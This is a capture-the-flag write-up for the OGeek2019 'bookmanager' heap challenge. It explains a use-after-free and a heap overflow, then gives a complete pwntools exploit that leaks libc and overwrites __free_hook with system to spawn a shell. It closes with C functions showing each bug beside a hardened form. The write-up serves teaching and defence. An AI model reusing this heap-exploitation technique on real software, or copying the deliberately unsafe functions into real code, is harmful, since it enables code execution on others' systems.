[OGeek2019]bookmanager

<h1>Analysis</h1>
<p>This challenge has quite a few bugs; I found two of them.</p>
<p><img src="https://pic.imgdb.cn/item/63a8691e08b68301639b1efe.png" alt="" /></p>
<p>Deleting a Section leaves a use-after-free.</p>
<p><img src="https://pic.imgdb.cn/item/63a8698c08b68301639bc129.png" alt="" /></p>
<p>Updating a Text has a heap overflow. A Chapter is allocated as a 0x90 chunk, a Section as a 0x40 chunk, and a Text as a chunk smaller than 0x100. So we can free a Chapter, then overflow from the Text to leak the unsorted bin address, then allocate a few Sections until one of them lands directly below the Text chunk, and finally overwrite that Section's Text pointer with __free_hook and write system through it.</p>
<h1>Exploit</h1>
<pre><code>from pwn import *
# context.log_level = 'debug'
# o = process('./pwn')
o = remote('node4.buuoj.cn', 29446)
libc = ELF('./libc-2.23.so')

o.sendlineafter('Name of the book you want to create: ', 'name')

def addChapter(name):
    o.sendlineafter('Your choice:', '1')
    o.sendlineafter('Chapter name:', name)

def addSection(chapter, section):
    o.sendlineafter('Your choice:', '2')
    o.sendlineafter('Which chapter do you want to add into:', chapter)
    # the program prints the address of the new Section
    addr = int(o.recvline()[2:-1], 16)
    o.sendlineafter('Section name:', section)
    return addr

def addText(section, num, text):
    o.sendlineafter('Your choice:', '3')
    o.sendlineafter('Which section do you want to add into:', section)
    o.sendlineafter('How many chapters you want to write:', str(num))
    o.sendlineafter('Text:', text)

def rmChapter(chapter):
    o.sendlineafter('Your choice:', '4')
    o.sendlineafter('Chapter name:', chapter)

def rmSection(section):
    o.sendlineafter('Your choice:', '5')
    o.sendlineafter('Section name:', section)

def rmText(section):
    o.sendlineafter('Your choice:', '6')
    o.sendlineafter('Section name:', section)

def updateSection(section, text):
    o.sendlineafter('Your choice:', '8')
    o.sendlineafter('What to update?(Chapter/Section/Text):', 'Section')
    o.sendlineafter('Section name:', section)
    o.sendlineafter('New Section name:', text)

def updateText(section, text):
    o.sendlineafter('Your choice:', '8')
    o.sendlineafter('What to update?(Chapter/Section/Text):', 'Text')
    o.sendlineafter('Section name:', section)
    o.sendlineafter('New Text:', text)

# leak the unsorted bin address
addChapter('a'*8)
addSection('a'*8, 'b'*8)
addText('b'*8, 0xf0, 'd'*6)
addChapter('e'*8)
addSection('e'*8, 'f'*8)
rmChapter('e'*8)
updateText('b'*8, 'd'*0x100)
o.sendlineafter('Your choice:', '7')
o.recvuntil("d"*0x100)
malloc_hook = u64(o.recv(6)+"\x00\x00") - 0x68
libc_base = malloc_hook - libc.sym['__malloc_hook']
log.info("libc_base: %x", libc_base)
free_hook = libc.sym['__free_hook'] + libc_base
system = libc.sym['system'] + libc_base

# get a Section allocated right below the Text, overflow into it to write
# __free_hook as its Text pointer, then write system into __free_hook
updateText('b'*8, 'd'*0xf0+p64(0)+p64(0x91))
rmText('b'*8)
addText('b'*8, 0x10, 'cccc')
addSection('a'*8, 'h'*8)
addSection('a'*8, '/bin/sh\x00')
updateText('b'*8, p64(0)*3 + p64(0x41) + '/bin/sh\x00' + p64(0)*3 + p64(free_hook))
updateText('/bin/sh\x00', p64(system))

# get shell
rmSection('/bin/sh\x00')
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63a86a7508b68301639d6153.png" alt="" /></p>
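<p>To make the two defect classes from the Analysis section concrete from the fixing side, here is an added C model (not the challenge binary's code) of a Text update and a Section delete, each beside a hardened form. The struct layout, the MAX_SECTIONS slot array, and the function names are assumptions for illustration; the fix in both cases is the same idea: record the capacity at allocation and bound every later write by it, and clear the owning pointer when a chunk is freed.</p>

```c
#include <stdlib.h>
#include <string.h>
#define MAX_SECTIONS 4

/* Assumed layout: a 0x20-byte name, the Text pointer, and (hardened only) the
 * capacity recorded when the Text buffer was allocated. */
typedef struct { char name[0x20]; char *text; size_t text_cap; } Section;
typedef struct { Section *sections[MAX_SECTIONS]; } Chapter;

Section *new_section(const char *name, size_t text_cap) {
    Section *s = calloc(1, sizeof *s);
    if (s == NULL) return NULL;
    strncpy(s->name, name, sizeof s->name - 1);
    s->text = calloc(1, text_cap);
    s->text_cap = text_cap;
    return s;
}

/* Bug class 1 (Text update): the copy trusts the length of the new text instead
 * of the capacity of the existing buffer, so a longer update runs into the next
 * heap chunk. Shown for contrast only; never call it with len > text_cap. */
void update_text_vuln(Section *s, const char *src, size_t len) {
    memcpy(s->text, src, len);
}

/* Hardened form: every later write is bounded by the recorded capacity. */
int update_text_safe(Section *s, const char *src, size_t len) {
    if (s == NULL || s->text == NULL || len > s->text_cap) return -1;
    memcpy(s->text, src, len);
    return 0;
}

/* Bug class 2 (Section delete): the chunk is freed but the Chapter still holds
 * the pointer, so a later lookup by name works on freed memory (use-after-free)
 * and a second delete frees it twice. */
void remove_section_vuln(Chapter *c, int idx) {
    free(c->sections[idx]);          /* slot keeps the stale pointer */
}

/* Hardened form: release the Text, then the Section, and clear the slot so the
 * stale pointer can neither be reused nor freed again. */
int remove_section_safe(Chapter *c, int idx) {
    if (c == NULL || idx < 0 || idx >= MAX_SECTIONS || c->sections[idx] == NULL)
        return -1;
    free(c->sections[idx]->text);
    free(c->sections[idx]);
    c->sections[idx] = NULL;
    return 0;
}
```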
